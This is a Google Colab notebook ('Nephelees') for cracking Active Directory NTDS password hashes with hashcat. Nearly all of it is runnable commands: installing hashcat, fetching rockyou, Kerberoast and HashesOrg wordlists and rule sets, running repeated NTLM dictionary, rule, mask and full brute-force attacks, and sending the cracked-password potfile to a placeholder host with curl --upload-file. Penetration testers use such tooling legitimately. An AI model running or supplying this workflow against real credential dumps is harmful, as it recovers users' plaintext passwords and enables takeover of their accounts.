{ "nbformat": 4, "nbformat_minor": 0, "metadata": { "colab": { "name": "google_colab_hashcat.ipynb", "provenance": [], "collapsed_sections": [] }, "kernelspec": { "name": "python3", "display_name": "Python 3" }, "accelerator": "GPU" }, "cells": [ { "cell_type": "markdown", "metadata": { "id": "bcgg59uiIxrv" }, "source": [ "# Nephelees - NTDS cracking on Google Colab\r\n", "\r\n", "0. Open the `ipynb` file by clicking the **Open in Colab** button\r\n", "1. Select **Runtime**, **Change runtime type**, and set **Hardware accelerator** to **GPU**.\r\n", "2. Select **Runtime** and **Run all**\r\n", "3. On your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\r\n", "4. Upload your anonymized hash list to the Colab with `!wget http://yourip:yourport/yourfile` or with the upload button\r\n", "5. Install requirements (hashcat + wordlists + rules)\r\n", "6. Run hashcat commands\r\n", "7. Recover the .pot file from the Google Colab with `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/` or download the file from the file explorer in the left-hand panel.\r\n", "8. On your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked passwords: `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username example.ntds wordlists/rockyou.txt`\r\n", "\r\n", "\r\n", "**/!\\** Every 12 hours or so, the data on our allotted virtual machine (disk, RAM, VRAM, CPU cache, etc.) is erased.
" ] }, { "cell_type": "code", "metadata": { "colab": { "base_uri": "https://localhost:8080/" }, "id": "A86GVzaW6YpT", "outputId": "fbeb72d7-0174-4812-91fe-6e74dba550ce" }, "source": [ "# Check GPU (Tesla P100 is the best GPU on Colab)\r\n", "!nvidia-smi -L" ], "execution_count": null, "outputs": [ { "output_type": "stream", "text": [ "GPU 0: Tesla P100-PCIE-16GB (UUID: GPU-711e1706-fccb-c944-73a8-796eb7a9d342)\n" ], "name": "stdout" } ] }, { "cell_type": "code", "metadata": { "id": "LWWa641VMu7Y" }, "source": [ "# Install Hashcat\r\n", "!apt install cmake build-essential -y\r\n", "!apt install checkinstall git -y\r\n", "!git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "_M4BMeXCNCA8" }, "source": [ "# Download wordlists\r\n", "import os\r\n", "wordlists_dir = \"wordlists\"\r\n", "os.system(\"wordlists_dir={}\".format(wordlists_dir))\r\n", "!mkdir ./$wordlists_dir\r\n", "\r\n", "!printf \"[+] Downloading the Rockyou wordlist...\\n\"\r\n", "!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\r\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n", "!cd $wordlists_dir && gunzip rockyou.txt.gz && rm rockyou.txt.gz\r\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\r\n", "\r\n", "!printf \"[+] Downloading the KerberoastPW wordlist...\\n\"\r\n", "!cd $wordlists_dir && wget https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\r\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n", "!cd $wordlists_dir && unxz kerberoast_pws.xz && rm kerberoast_pws.xz\r\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep kerberoast_pws)\"\r\n", "\r\n", "!printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\r\n", "!cd 
$wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\r\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n", "!cd $wordlists_dir && gunzip hashesorg2019.gz && rm hashesorg2019.gz\r\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\r\n", "\r\n", "# !printf \"[+] Downloading the Have I been Pwned V7 wordlist...\\n\"\r\n", "# !cd $wordlists_dir && wget 'https://hashes.org/download.php?type=found&hashlistId=8161' -O HaveIbeenPwnedV7.txt\r\n", "# !printf \"[+] Wordlist downloaded !\\n[+]\\n\"\r\n", "# !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep HaveIbeenPwnedV7)\"\r\n", "\r\n", "# 28 GB / https://download.weakpass.com/wordlists/1863/weakpass_2.gz\r\n", "# https://github.com/danielmiessler/SecLists/raw/5c9217fe8e930c41d128aacdc68cbce7ece96e4f/Passwords/Keyboard-Combinations.txt" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "d1cxo70DQDxs" }, "source": [ "# Download rules\r\n", "import os\r\n", "rules_dir = \"/content/hashcat/rules\"\r\n", "os.system(\"rules_dir={}\".format(rules_dir))\r\n", "# rules_dir is an absolute path, so create it as-is (no ./ prefix); -p is a no-op if it already exists\r\n", "!mkdir -p $rules_dir\r\n", "\r\n", "!printf \"[+] Downloading the hob064 ruleset...\\n\"\r\n", "!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\r\n", "!printf \"[+] Rules downloaded !\\n\"\r\n", "!printf \"[+] Location : $(ls $rules_dir | grep hob064)\"\r\n", "\r\n", "!printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\r\n", "!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\r\n", "!printf \"[+] Rules downloaded !\\n\"\r\n", "!printf \"[+] Location : $(ls $rules_dir | grep d3adhob0)\"" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "vNuhf2r4JxdD" }, "source": [ "# 2. 
Download your hashfile from your machine\n", "# for OPSEC reasons, please don't paste your hashes on a pastebin\n", "# use ngrok (https://ngrok.com/) + updog (https://github.com/sc0tfree/updog) instead if you don't have a public IP address\n", "!wget https://YOURLISTENERIP:YOURPORT/YOURFILE" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "xYgvNWGbKXSp" }, "source": [ "# 3. Crack your hashes\n", "\n", "# Quick cracking - rockyou wordlist - around 10 minutes\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/hob064.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/d3adhob0.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/dive.rule --username\n", "\n", "# Medium cracking - kerberoast wordlist - around 30 minutes\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/hob064.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/d3adhob0.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status 
--status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/dive.rule --username\n", "\n", "# Insane cracking - hashesorg2019 wordlist - 2min + 8 min + 3h + 6h\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/hob064.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/d3adhob0.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/dive.rule --username" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "RCjfsWx6MwtT" }, "source": [ "# 4. More cracking materials\r\n", "import os\r\n", "pack_dir = \"pack\"\r\n", "os.system(\"pack_dir={}\".format(pack_dir))\r\n", "!mkdir ./$pack_dir\r\n", "\r\n", "!cd $pack_dir && wget https://raw.githubusercontent.com/iphelix/pack/master/statsgen.py\r\n", "!cd $pack_dir && wget https://raw.githubusercontent.com/iphelix/pack/master/maskgen.py\r\n", "# statsgen.py expects one password per line; the potfile stores hash:password, so drop the hash field first\r\n", "!cut -d: -f2- /content/cracked.pot > $pack_dir/cracked_passwords.txt\r\n", "!python2 $pack_dir/statsgen.py $pack_dir/cracked_passwords.txt -o $pack_dir/hashcat.mask\r\n", "!python2 $pack_dir/maskgen.py $pack_dir/hashcat.mask --targettime 3600 --optindex -q -o $pack_dir/hashcat_1H.hcmask\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 3 /content/*.ntds $pack_dir/hashcat_1H.hcmask" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "Zs5N4JmKVNWX" }, "source": [ "# 5. 
Wikipedia list\r\n", "!apt install hydra -y\r\n", "!cd /content/wordlists && wget http://download.wikimedia.org/nowiki/latest/nowiki-latest-pages-articles.xml.bz2\r\n", "!cd /content/wordlists && bzcat nowiki-latest-pages-articles.xml.bz2 | grep '^[a-zA-Z]' | sed 's/[-_:.,;#@+?{}()&|§!¤%`<>=\"\\/]/\\ /g' | tr ' ' '\\n' | sed 's/[0-9]//g' | sed 's/[^A-Za-z0-9]//g' | sed -e 's/./\\L\\0/g' | sed 's/[^abcdefghijklmnopqrstuvwxyzæøå]//g' | sort -u | pw-inspector -m1 -M20 > nowiki.lst\r\n", "!cd /content/wordlists && wc -l nowiki.lst\r\n", "\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --username\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/hob064.rule --username\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/d3adhob0.rule --username\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/dive.rule --username" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "D5T_SbzZNjhd" }, "source": [ "# 6. 
Full bruteforce for 8/9 characters and compliance masks\r\n", "# ----- around 3 hours on a p100 ------\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 /content/hashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1\r\n", "# ----- more than 3 days on a P100 --------\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a \r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a" ], "execution_count": null, "outputs": [] } ] }